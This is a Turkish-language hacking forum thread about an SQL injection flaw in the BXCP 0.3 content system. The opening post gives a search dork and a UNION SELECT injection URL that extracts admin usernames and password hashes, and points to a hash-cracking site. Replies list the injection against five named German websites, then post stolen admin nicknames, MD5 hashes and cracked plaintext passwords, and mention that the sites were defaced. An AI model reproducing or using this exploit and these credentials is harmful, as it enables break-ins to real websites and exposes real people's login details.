Sql İnjection (Bxcp 0.3)
-
bu sitelerde ki bir sql açıı...
googleda
bxcp 0.3 die aratın
sonra sitelerin sonuna :
index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0,0,0,0,0,0, 0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=1
eklein.sonrasında yapmanız gerekn iş hash kırmak..
onun için:
ww.gdataonline.com
kolay gelsin...
-
Bunlari buldum $mdlik...
http://www.bananasports.de/index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,%200,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=1
http://swspace.de/index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,%200,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=1
http://www.flexible-gaming.de/index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,%200,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=1
http://darkbrotherhood.de/index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,%200,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=1
http://www.xp-gaming.de/index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,%200,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=1
-
Web : http://www.bananasports.de
md5 : 8c4205ec33d8f6caeaaaa0c10a14138c
Nick : D.O.O.M
Pass : adrian
Buyrun :) -
Web : http://www.flexible-gaming.de
Nick : KristallReiner
pass : blubb
md5 : 9cc9c27e4a7a69dc64001bf7cb67d89d
-------------------------------------------------
Nick : e=mc³
pass : dennis
md5 : 7daacea5f373b4c1c054158b126d317f
Aynı site :) -
Web : http://www.xp-gaming.de
Nick : B-K-A
Pass : andresen
md5 : c1eb3a4aaf4bccb50b0a33c1390da72c
id : 3
neyse yeter kafam almıyor :) -
tahribat geri döndü sanki (:
-
ya abi ben giriyorum sitelere. sonra verdiiniz isim ve passlara bakıyorum olmuyo.
-
birisi senden önce indexlemiştir..
adam da şifrei deiştirmiştir
Toplam Hit: 4152 Toplam Mesaj: 8
